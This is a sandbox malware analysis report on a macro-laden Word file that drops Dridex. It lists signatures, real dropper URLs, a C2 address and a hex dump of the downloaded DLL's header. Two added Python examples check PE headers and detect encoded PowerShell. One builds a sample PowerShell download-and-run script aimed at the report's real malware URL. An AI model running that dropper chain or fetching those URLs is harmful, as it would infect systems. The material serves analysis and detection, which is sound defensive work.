Analysis Report Order.802796810.doc

Overview

General Information

Sample Name: Order.802796810.doc
Analysis ID: 339433
MD5: b1c2a32cb28d07acc8b2d65ab2012db8
SHA1: 3ac3123decd86944a576227554edbcbb3d62aa58
SHA256: 6951461b231a0f4f2ee086768d3e5e79b30dd68efd55da80997d73c160e6ddce

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (the option may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://mail.kyojinconduits.com/jhgun753.zip Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rundll32.exe.8c0000.1.raw.unpack Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 52270", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mail.kyojinconduits.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://accuratebc.gr/e0lw3t.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://e-macom.com.br/cl35e0.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://legion.seriesnow.website/q33rv2.zip
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Jan 2021 01:32:51 GMTServer: ApacheLast-Modified: Sun, 03 Jan 2021 06:35:59 GMTAccept-Ranges: bytesContent-Length: 303616Content-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 aa e0 fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 
00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jhgun753.zip HTTP/1.1 | Host: mail.kyojinconduits.com | Connection: Keep-Alive (no User-Agent header)
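The response above is declared as Content-Type: application/zip with Content-Length 303616, yet the body starts with 4d 5a ("MZ"), and the section table in the dump carries the names .2, .rdata2, .text5 and .text4 that the "PE file contains sections with non-standard names" signature refers to. The following is an added example, not code from the Joe Sandbox report: a small checker that compares the declared MIME type with the file magic, parses the COFF header and section table, and reports the anomalies. The sample header region it runs on is rebuilt with struct.pack from the field values visible in the report's Data Raw dump (machine, section count, timestamp, characteristics, the nine section headers, the import/resource/relocation directories); the DOS stub, the optional-header padding and the omission of the section bodies are assumptions, not a byte-for-byte copy.

```python
"""Check what the 'application/zip' download in the report really carries.

Added example (not part of the sandbox report). build_sample_headers() rebuilds
the header region from the values shown in the report's Data Raw dump; the
section bodies are not included, so only header-level checks run offline.
"""
import struct
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}
MAGIC = {b"MZ": "application/x-dosexec", b"PK\x03\x04": "application/zip"}


def declared_type_mismatch(content_type, body):
    """True when the body's magic bytes contradict the HTTP Content-Type."""
    declared = content_type.split(";")[0].strip().lower()
    for prefix, real in MAGIC.items():
        if body.startswith(prefix):
            return real != declared
    return False  # unknown magic: nothing to conclude


def parse_pe(data):
    """Minimal PE header parser: DOS header -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "chars": sc})
    return {"machine": machine, "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"),
            "is_dll": bool(chars & IMAGE_FILE_DLL),
            "compiled": datetime.fromtimestamp(stamp, tz=timezone.utc), "sections": sections}


def section_findings(pe):
    """Non-standard section names, and code sections that lack MEM_EXECUTE."""
    out = []
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            out.append(f"{s['name']}: non-standard section name")
        if s["chars"] & IMAGE_SCN_CNT_CODE and not s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            out.append(f"{s['name']}: flagged as code but not executable")
    return out


def file_extent(pe):
    """Highest raw file offset any section claims; compare with Content-Length."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])


# Section headers as read from the report's dump: name, VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, Characteristics.
SECTIONS = [
    (b".text",   0x19AE,  0x01000, 0x01A00, 0x00400, 0x60000020),
    (b".rdata",  0x00E1,  0x03000, 0x00200, 0x01E00, 0x40000040),
    (b".2",      0x000A,  0x04000, 0x00200, 0x02000, 0x40000040),
    (b".rdata2", 0x000A,  0x05000, 0x00200, 0x02200, 0x40000040),
    (b".data",   0x1CD8,  0x06000, 0x01E00, 0x02400, 0xC0000040),
    (b".text5",  0x0250,  0x08000, 0x00400, 0x04200, 0x40000020),
    (b".text4",  0x452CC, 0x09000, 0x45400, 0x04600, 0x40000020),
    (b".rsrc",   0x00E8,  0x4F000, 0x00200, 0x49A00, 0x40000040),
    (b".reloc",  0x05DC,  0x50000, 0x00600, 0x49C00, 0x42000040),
]
SAMPLE_CONTENT_LENGTH = 303616   # Content-Length from the report's HTTP response


def build_sample_headers():
    """Constructed sample: header region rebuilt from the report's values (DOS stub omitted)."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")   # e_lfanew = 0x80
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, len(SECTIONS), 0x5FFEE0AA, 0, 0, 0xE0, 0x210E)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 2, 50, 0x47200, 0x2C00, 0, 0x1CE0, 0x1000, 0x3000,
                      0x10000000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                      0x51000, 0x400, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[5] = (0x638C, 0xC8), (0x4F000, 0xE8), (0x50000, 0x5DC)  # import, resource, basereloc
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in SECTIONS)
    return (dos + coff + opt + table).ljust(0x400, b"\0")   # SizeOfHeaders = 0x400


if __name__ == "__main__":
    body = build_sample_headers()
    pe = parse_pe(body)
    print("Content-Type mismatch:", declared_type_mismatch("application/zip", body))
    print(pe["format"], "DLL" if pe["is_dll"] else "EXE", "compiled", pe["compiled"].isoformat())
    for finding in section_findings(pe):
        print(" -", finding)
    print("sections end at", file_extent(pe), "; Content-Length", SAMPLE_CONTENT_LENGTH)
```

On a real capture, pass the raw response body to parse_pe instead of the rebuilt headers. Two things the header alone already tells an analyst: the Characteristics word 0x210E has IMAGE_FILE_DLL set, which is why the sandbox saw rundll32.exe rather than a direct execution, and the last section (.reloc, raw offset 0x49C00 + 0x600) ends at exactly 303616 bytes, so the server delivered the complete DLL with no overlay. The COFF timestamp decodes to 13 January 2021, later than the server's Last-Modified date of 3 January; either value is trivially forged, so neither should be treated as ground truth for build time.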
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1A67161-551E-40AF-9919-E039C2A6E74E}.tmp Jump to behavior
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://accuratebc.gr/e0lw3t.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://e-macom.com.br/cl35e0.zip
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://legion.seriesnow.website/q33rv2.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094918402.0000000003CBC000.00000004.00000001.sdmp String found in binary or memory: http://mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096384093.000000001BA82000.00000004.00000001.sdmp String found in binary or memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError, 7_2_10001CE0

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" button on the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 0 Screenshot OCR: Enable content"
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5133
Source: unknown Process created: Commandline size = 5032
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5032 Jump to behavior
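The signatures "Encrypted powershell cmdline option found", "Sigma detected: Suspicious Encoded PowerShell Command Line" and the 5133- and 5032-byte command lines above describe one detection problem: a macro launching powershell.exe with an -EncodedCommand payload large enough to hide a downloader. The report records the sizes, the dropper URLs and the drop path but not the command lines themselves. What follows is an added example, not code from the report: detection logic that decodes the UTF-16LE base64 payload, scans both the outer command line and the decoded script, and extracts URLs. The two events it runs on are constructed stand-ins; the URL and drop path are the ones from the report, while the variable padding, the rundll32 invocation and the benign admin command are assumptions.

```python
"""Flag encoded or oversized PowerShell command lines in process-creation events.

Added example, not part of the sandbox report. The sample events are constructed;
only the URL and the drop path are taken from the report.
"""
import base64
import re

LONG_CMDLINE = 1024   # the report's lines were ~5 KB; 1 KB is a common alert threshold

# Patterns worth calling out in the outer command line or the decoded script.
SUSPICIOUS = [(re.compile(p, re.I), label) for p, label in (
    (r"\bdownload(?:file|string|data)\b", "WebClient download"),
    (r"\b(?:iex|invoke-expression)\b", "Invoke-Expression"),
    (r"\bfrombase64string\b", "inline base64 decode"),
    (r"\brundll32(?:\.exe)?\b", "rundll32 launch"),
    (r"-w(?:indowstyle)?\s+hidden\b", "hidden window"),
    (r"-nop\b", "-NoProfile short form"),
)]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def is_encoded_flag(token):
    """powershell.exe accepts -EncodedCommand, the aliases -e and -ec, and any
    unambiguous prefix such as -en or -enc, with '-' or '/', case-insensitive."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    body = token[1:].lower()
    return body in ("e", "ec") or (len(body) >= 2 and "encodedcommand".startswith(body))


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind the first encoded-command flag, or None."""
    tokens = cmdline.split()
    for flag, payload in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None   # flag present but payload is not a clean base64 UTF-16LE script
    return None


def analyze_process_event(commandline):
    """Findings for one process-creation command line (Sysmon/EDR style record)."""
    findings = []
    if len(commandline) >= LONG_CMDLINE:
        findings.append(f"very long command line ({len(commandline)} chars)")
    decoded = decode_encoded_command(commandline)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    text = commandline + "\n" + (decoded or "")        # scan wrapper and payload together
    findings.extend(label for rx, label in SUSPICIOUS if rx.search(text))
    return {"decoded": decoded, "urls": URL_RE.findall(text), "findings": findings,
            "alert": decoded is not None or len(findings) >= 2}


# --- constructed sample events -------------------------------------------------
# Junk assignments stand in for the obfuscation that inflates real droppers to ~5 KB.
_PADDING = "".join(f"$q{i}={i * 7};" for i in range(120))
SAMPLE_SCRIPT = (
    _PADDING
    + "$u='http://mail.kyojinconduits.com/jhgun753.zip';"          # URL from the report
    + "$p=\"$env:USERPROFILE\\Lx8o0sz\\Gztazkl\\I11F.dll\";"       # drop path from the report
    + "(New-Object Net.WebClient).DownloadFile($u,$p);"
    + "Start-Process rundll32.exe $p"                               # assumed invocation
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = {
    "dropper": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED,
    "admin": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_EVENTS.items():
        result = analyze_process_event(cmd)
        print(f"[{name}] alert={result['alert']} findings={result['findings']} urls={result['urls']}")
```

The prefix matching in is_encoded_flag matters: a rule that only looks for the literal string "-EncodedCommand" misses "-e", "-ec" and "-enc", all of which powershell.exe accepts. Scanning the wrapper and the decoded script together is what ties the "-w hidden" launch options to the download and rundll32 activity inside the payload, which is the combination the sandbox reports as a single chain.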
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess, 7_2_0029B780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029BA14 NtSetInformationProcess, 7_2_0029BA14
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00925CB0 7_2_00925CB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091E0A0 7_2_0091E0A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092DCA0 7_2_0092DCA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009250A0 7_2_009250A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00924CA0 7_2_00924CA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090ACD0 7_2_0090ACD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091A0D0 7_2_0091A0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009198DA 7_2_009198DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009188C0 7_2_009188C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918CC0 7_2_00918CC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091D030 7_2_0091D030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921020 7_2_00921020
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091C590 7_2_0091C590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091D980 7_2_0091D980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092D180 7_2_0092D180
